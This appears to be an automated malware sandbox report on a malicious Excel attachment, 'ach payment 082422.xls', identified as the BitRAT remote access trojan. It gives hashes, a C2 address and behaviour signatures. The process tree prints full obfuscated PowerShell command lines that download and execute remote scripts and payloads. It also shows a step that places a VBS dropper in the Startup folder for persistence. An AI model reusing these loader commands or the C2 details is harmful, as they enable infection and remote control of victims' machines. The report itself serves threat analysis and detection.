Overview

overview

10

Static

static

8

ach paymen...22.xls

windows7-x64

10

ach paymen...22.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    123s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-08-2022 18:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ach payment 082422.xls

  • Size

    29KB

  • MD5

    70c9d8b73d8b0b704ca4eed431f0b8b9

  • SHA1

    700df606142d4d599078112277f6352134a5376b

  • SHA256

    33a03e5a48aa54e8ade7fa89d977a846b517956ee17a0419c68698742104450b

  • SHA512

    b682cf9edfac472dfec29d8bad297b436321eb16c6dd3bbd3c77d660fabdf5089296657a02e1d74fb960f8784cf87bb1d924778806ae75bf484324dbb719bbed

  • SSDEEP

    768:vgk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJRB5kPok:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdv

Score
10/10
bitrattrojanupx

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

bitm.dvrlists.com:6061

Attributes
  • communication_password

    cef08aa1523518b499f65898132b7512

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ach payment 082422.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.sldnur\''+pmet:vne$,''sbv.tneilC/clac/nomwen/moc.ehgityennikcm//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\rundls.vbs')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3996
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rundls.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2580
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101101,01100011,01101011,01101001,01101110,01101110,01100101,01111001,01110100,01101001,01100111,01101000,01100101,00101110,01100011,01101111,01101101,00101111,01101110,01100101,01110111,01101101,01101111,01101110,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4988
          • C:\WINDOWS\syswow64\calc.exe
            "C:\WINDOWS\syswow64\calc.exe"
            5⤵
              PID:4388
            • C:\WINDOWS\syswow64\calc.exe
              "C:\WINDOWS\syswow64\calc.exe"
              5⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4660
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iFKdFHgK.bat" "
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4772
                • C:\Windows\system32\timeout.exe
                  timeout /t 5 /nobreak
                  7⤵
                  • Delays execution with timeout.exe
                  PID:1124
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\rundls.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundls.vbs'
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3192
    • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
      "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
      1⤵
        PID:1792
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3568
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3568 CREDAT:17410 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1712

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      3
      T1012

      System Information Discovery

      4
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d336b18e0e02e045650ac4f24c7ecaa7

        SHA1

        87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

        SHA256

        87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

        SHA512

        e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        4d27898144ddb4e3d48c0e6703e82d75

        SHA1

        76c5bfbd58e929f960fece53f7b7365a70e46df9

        SHA256

        5e1a0bd17b3c285604ac0a65e0bd3cf0bb9bec93feeb9c9841dcc2bae7a13d0e

        SHA512

        5c7a5d2ee0e028e547d80a60e7c12434abe9ecb59e136c05dba64ce159c63511f730a15c6b11bd3ed4ef236fc381d57dc195dd71c6bf87bbb934108159ce4867

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\b944d715-ae68-492a-9ac2-0910fdf2d15c\AgileDotNetRT64.dll
        Filesize

        75KB

        MD5

        42b2c266e49a3acd346b91e3b0e638c0

        SHA1

        2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

        SHA256

        adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

        SHA512

        770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\iFKdFHgK.bat
        Filesize

        270B

        MD5

        b4e6763be26f7ff13b03846cdd361748

        SHA1

        8c46b80df30efc869726541396a5d55fe67d654f

        SHA256

        5ff5f5bb73ced3285bda3f93823ece49453eddea9f6a64219f347818c68d714a

        SHA512

        521fae7851e1fed3d38a6b2515593da626c3010c3df56706c2db6b6a121e369e4bea9c0a977b9dbe0afcf454d4c1ddddd00e7d94f4e61c0d24eea04f262c2989

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\rundls.vbs
        Filesize

        2KB

        MD5

        bce33b78d45f9f86c00d35f0cbdeaa7c

        SHA1

        89f52ab70ec72cca1f69a8b6139fc3b7181d667c

        SHA256

        32202bd660c1cbe597504f6108e09c74de842917aaf3ae88446712ec9be78209

        SHA512

        fdd7af18ec9c94fe5708e8b277ade1036778e692e807649818cab6f5f585f73ff4cc616636f30c579956f5de11bd46290eeda77384d696478898b8c93528ae32

        Download Submit
      • memory/1124-170-0x0000000000000000-mapping.dmp
        Download
      • memory/2580-142-0x0000000000000000-mapping.dmp
        Download
      • memory/3192-151-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3192-150-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3192-146-0x0000000000000000-mapping.dmp
        Download
      • memory/3996-141-0x00007FFBE0360000-0x00007FFBE0E21000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3996-139-0x0000000000000000-mapping.dmp
        Download
      • memory/3996-144-0x00007FFBE0360000-0x00007FFBE0E21000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/3996-140-0x0000020776CE0000-0x0000020776D02000-memory.dmp
        Filesize

        136KB

        Download
      • memory/4620-172-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-138-0x00007FFBC7A10000-0x00007FFBC7A20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-174-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-137-0x00007FFBC7A10000-0x00007FFBC7A20000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-136-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-132-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-135-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-173-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-133-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-175-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4620-134-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmp
        Filesize

        64KB

        Download
      • memory/4660-157-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4660-159-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4660-160-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4660-161-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4660-156-0x00000000007E2730-mapping.dmp
        Download
      • memory/4660-163-0x0000000073BD0000-0x0000000073C09000-memory.dmp
        Filesize

        228KB

        Download
      • memory/4660-164-0x0000000073F70000-0x0000000073FA9000-memory.dmp
        Filesize

        228KB

        Download
      • memory/4660-165-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4660-167-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4660-168-0x0000000073BD0000-0x0000000073BEF000-memory.dmp
        Filesize

        124KB

        Download
      • memory/4660-155-0x0000000000400000-0x00000000007E4000-memory.dmp
        Filesize

        3.9MB

        Download
      • memory/4772-166-0x0000000000000000-mapping.dmp
        Download
      • memory/4988-152-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4988-162-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4988-154-0x00007FFBD98E0000-0x00007FFBD9A2E000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/4988-149-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4988-145-0x0000000000000000-mapping.dmp
        Download